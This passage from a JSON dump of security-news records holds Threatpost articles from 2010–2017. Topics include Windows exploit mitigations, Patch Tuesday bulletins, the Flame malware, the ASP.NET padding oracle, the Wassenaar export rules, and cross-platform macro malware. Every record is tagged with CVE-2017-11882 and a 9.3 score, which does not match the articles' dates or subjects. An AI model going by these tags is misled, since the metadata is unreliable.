Not so good for Windows 7,\u201d Gary McGraw of Cigital and Ivan Arce of Core Security wrote in an [analysis of the Virtual PC situation](<http://www.informit.com/articles/article.aspx?p=1588145>) for InformIT. \n\n\u201cIn our view, design and architecture decisions made for Virtual PC \ncompletely invalidate some basic assumptions about processes in modern \nWindows operating systems. Like falling dominoes, this in turn \ninvalidates almost all anti-exploit mechanisms that Microsoft has built \ninto their OS over the past decade, which then topples over and turns an \nentire class of bugs deemed un-exploitable on non-virtualized systems \ninto potential vulnerabilities on virtualized systems. Backwards time \nwarp and a table full of fallen dominoes,\u201d they wrote.\n\nThis may seem an isolated, extreme case, but there have been other examples in the last few months of the same kind of assumptions being ground to pieces under the wheels of logic and ingenuity. After the disclosure of the high-profile attack on Google and other big companies last fall, word quickly leaked out that the flaw used to compromise the search giant was an unpatched problem in Internet Explorer. Several experts said the problem couldn\u2019t be exploited on IE 8 on Windows 7 because of the memory protections that Microsoft had added.\n\nWithin a few days, that was proven false as researcher Dino Dai Zovi, followed by others, used the [same exploit on a Windows 7 machine running IE 8](<https://threatpost.com/memory-protections-advance-exploits-stay-step-ahead-030810/>), a technique he demonstrated live at the RSA Conference in March. 
The point, Dai Zovi and others maintain, is that exploit mitigations are just that: mitigations.\n\n\u201cAttack mitigation takes the universe of exploit techniques and narrows \nit down,\u201d Dai Zovi said during his RSA talk. \u201cBut preventing the introduction of malicious code \nisn\u2019t enough to prevent malicious computations.\u201d\n\nThat\u2019s a point that\u2019s becoming ever clearer.\n\n\u201cMicrosoft claims that the Virtual PC problem \u2018isn\u2019t a vulnerability _per \nse_\u2019 because the problem described only affects \u201csecurity-in-depth\u201d \nmechanisms and attackers would need to find and exploit an actual \nimplementation bug to leverage it. Even if Microsoft is right on that \ncount (which we don\u2019t think they are), they are ignoring the bigger \nissue of assumptions. Bugs previously deemed non-exploitable for \nanything other than crashing systems are now potentially exploitable \nunder a virtualized OS. Because of the way bugs are slated for \nmitigation in the real world, a majority of those bugs remain unpatched \u2014 \na problem of prioritization and the enormity of the bug pile in \napplications,\u201d McGraw and Arce conclude.\n", "cvss3": {}, "published": "2010-05-03T19:10:03", "type": "threatpost", "title": "How Assumptions May Be Making Us All Less Secure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:37:06", "id": "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "href": "https://threatpost.com/how-assumptions-may-be-making-us-all-less-secure-050310/73913/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "Microsoft has been busy of late, what with the scramble surrounding the [Flame malware](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) and the forged certificate that the attackers were able to use to spread the malware via a 
fake Windows Update service. Now, the company is planning to release seven bulletins next Tuesday covering 28 vulnerabilities in its [June Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>).\n\nThree of the bulletins Microsoft will release are rated critical, and all of the vulnerabilities they cover can lead to remote code execution. The four other bulletins are rated important, and one of those can result in remote code execution. The seven bulletins will fix flaws in Windows, the .NET Framework, Microsoft Dynamics, Internet Explorer and Visual Basic for Applications.\n\nMicrosoft also will be rolling out a change to its Windows Update service in the coming days that is designed to harden the infrastructure and prevent the kind of attack that the Flame authors were able to pull off. That change will involve deploying a new certificate that will be the only one trusted by WU clients, and that certificate only will be used to protect WU files.\n\nHere\u2019s the list of the bulletins:\n\nBulletin ID | Maximum Severity Rating and Vulnerability Impact | Restart Requirement | Affected Software \n---|---|---|--- \nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows \nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows, \nInternet Explorer \nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows, \nMicrosoft .NET Framework \nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Office, \nMicrosoft Visual Basic for Applications \nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | May require restart | Microsoft Dynamics AX \nBulletin 6 | 
[Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows \nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows\n", "cvss3": {}, "published": "2012-06-07T17:29:16", "type": "threatpost", "title": "Microsoft to Fix 28 Vulnerabilities in June Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:E46805A1822D16B4725517D4B8786F57", "href": "https://threatpost.com/microsoft-fix-28-vulnerabilities-june-patch-tuesday-060712/76662/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**UPDATE \u2013 **In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. 
This has been compounded after last Thursday\u2019s advanced notification that indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 of the browser. Both are use-after-free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. \u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u201c2\u201d in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. 
[MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage,\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7, said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated critical by Microsoft; a denial-of-service bug in Active Directory has caught experts\u2019 attention. 
[MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. 
An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevate privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson.\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. 
Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update failed to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). 
Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. 
We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "Microsoft has issued a security advisory for a[ recently disclosed vulnerability ](<https://threatpost.com/microsoft-issues-advisory-aspnet-hole-092010/'s+Most+Popular>)in ASP.NET that could leave millions of Web pages vulnerable to attack. \n\nThe company on Friday[ released Security Advisory 2416728 ](<http://blogs.technet.com/b/msrc/archive/2010/09/17/security-advisory-2416728-released.aspx>)addressing the ASP.NET security hole, which was first disclosed by researchers at the annual ekoparty hacking conference in Buenos Aires, Argentina on Friday. Microsoft said the company is not aware of any attacks leveraging the hole, which concerns ASP.NET\u2019s implementation of the AES encryption algorithm to protect the integrity of Web session cookies that can store sensitive information. However, it provided steps to safeguard vulnerable ASP.Net applications from attacks. \n\nMicrosoft said it is continuing to investigate the issue and is working with other security companies in the Microsoft Active Protections Program (MAPP) to build protections against attacks that try to leverage the ASP.NET vulnerability. Microsoft also chided researchers for revealing the hole at a public hacking conference rather than working with the company to develop a patch first. 
\n\n\u201cWe believe public disclosure before a comprehensive update can be produced only leads to customer risk through criminal activity,\u201d Microsoft said in its advisory.\n\nOn Friday, researchers Juliano Rizzo and Thai Duong[ demonstrated the technique they developed for stealing cryptographic keys for ASP.NET Web applications ](<https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/>)using a tool called the Padding Oracle Exploit Tool.\n\nIn a[ blog post accompanying the advisory](<http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx>), Microsoft said the impact of the vulnerability will vary depending on the ASP.Net application that is being targeted, but that applications using ASP.Net 3.5 SP1 or above could be made to divulge the contents of \u201can arbitrary file\u201d using the Padding Oracle attack, exposing passwords, database connection strings or other sensitive data, Microsoft said. \n\nA workaround provided by the company suggests using ASP.NET\u2019s customErrors feature to return the same error page regardless of the error encountered on the server, thus denying attackers the information needed to deduce the cipher text. Some ASP.NET applications may already be configured to return the same message for all errors. Microsoft provided a script to detect ASP.NET applications that were not configured to do so. \n\nThe company promised to release more information as it became available and as it worked towards a permanent fix for the ASP.NET hole. 
\n", "cvss3": {}, "published": "2010-09-20T11:09:53", "type": "threatpost", "title": "Microsoft issues Advisory on ASP.NET Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:02", "id": "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "href": "https://threatpost.com/microsoft-issues-advisory-aspnet-hole-092010/74488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec, which found that some attackers have been able to use command-and-control (C&C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrites the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module, and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered in recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. 
While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. 
Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. 
Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. 
Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. 
Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:54", "description": "Researchers came across a malicious Word document last week that doesn\u2019t discriminate between OS platforms. 
The malicious Word document is designed to spread malware on either Mac OS X or Microsoft Windows, depending on where it\u2019s opened.\n\nLike many other strains of malware these days, the sample, which researchers at [Fortinet observed](<http://blog.fortinet.com/2017/03/22/microsoft-word-file-spreads-malware-targeting-both-apple-mac-os-x-and-microsoft-windows>) on March 16, relies on tricking users into enabling macros.\n\nOnce opened and macros are enabled, malicious VBA, or Visual Basic for Applications, code is executed, which runs the AutoOpen() macro. The macro goes on to read a base64-encoded string in the file, which, depending on the operating system, executes a certain script.\n\nFor victims running Mac OS X, the script is fairly straightforward. It downloads a malicious file containing another script, written in Python, that\u2019s executed and attempts to communicate with the attacker\u2019s server. The downloaded script is a modded version of a Python Meterpreter file, researchers say.\n\nMeterpreter, part of the Metasploit framework, is an extensible payload component that uses in-memory DLL injection stagers. The tool has been adopted by several groups of late, including [GCMAN](<https://threatpost.com/spree-of-bank-robberies-show-cybercriminals-borrowing-from-apt-attacks/116173/>) and a group of attackers who have been spotted carrying out [fileless malware](<https://threatpost.com/fileless-memory-based-malware-plagues-140-banks-enterprises/123652/>)-based attacks.\n\nThe script that triggers the exploit on Windows is a little more involved. Like a Russian nesting doll, one layer of base64-encoded data spawns a PowerShell script, which decompresses another layer of base64-encoded code which leads to another PowerShell script. Once executed, the script finally downloads a 64-bit DLL file, which executes and communicates with the attacker\u2019s server. 
Researchers with Fortinet believe the Windows side of the malware only affects 64-bit versions of Windows.\n\nWhile they have a pretty good idea of how the malware spreads, researchers aren\u2019t completely sure what the attackers behind it were after. Peixue Li, senior manager of FortiGuard Service Development and Security Research, told Threatpost Thursday that when they observed TCP sessions to the attacker\u2019s server \u2013 both Windows and Apple \u2013 the server wasn\u2019t answering. Instead, Wireshark just gave them a TCP retransmission error message.\n\nMacro malware that explicitly targets macOS isn\u2019t necessarily new \u2013 but it has been a recent development. Researchers with Synack came across macro malware that executes solely on Mac machines [back in February](<https://threatpost.com/macro-malware-comes-to-macos/123640/>).\n\nThat malware, peddled by a group whose IP traces back to Russia, operated in a similar fashion. The victim would have to agree to enable macros for a Word document on the Mac version of Word. After enabled, a macro decodes data, and like the malware Fortinet researchers found, executes it in Python. The malware Synack found relies on leveraging a legitimate Python post-exploitation OS X and Linux agent, EmPyre.\n\nFortinet\u2019s researchers claim they\u2019re still analyzing the malware, but Li says the fact that the malware\u2019s Python post-exploitation agent is different than the one used by the malware seen by Synack separates it from the pack.\n\n\u201cThe malware we analyzed targets both Mac OS and Windows\u2026 the Python post-exploitation agent used by the malware is different. 
One is EmPyre, the other is Meterpreter,\u201d Li said. \u201cCross-platform Macro-based malware could become a trend, perhaps.\u201d\n", "cvss3": {}, "published": "2017-03-23T15:21:43", "type": "threatpost", "title": "Malware That Targets Both Microsoft, Apple Operating Systems Found", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-29T18:55:25", "id": "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "href": "https://threatpost.com/malware-that-targets-both-microsoft-apple-operating-systems-found/124531/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "The [RC4](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>) and SHA-1 algorithms have taken a lot of hits in recent years, with new attacks popping up on a regular basis. Many security experts and cryptographers have been recommending that vendors begin phasing the two out, and Microsoft on Tuesday said that it is now recommending to developers that they deprecate RC4 and stop using the SHA-1 hash algorithm.\n\nRC4 is among the older stream cipher suites in use today, and there have been a number of practical attacks against it, including plaintext-recovery attacks. The improvements in computing power have made many of these attacks more 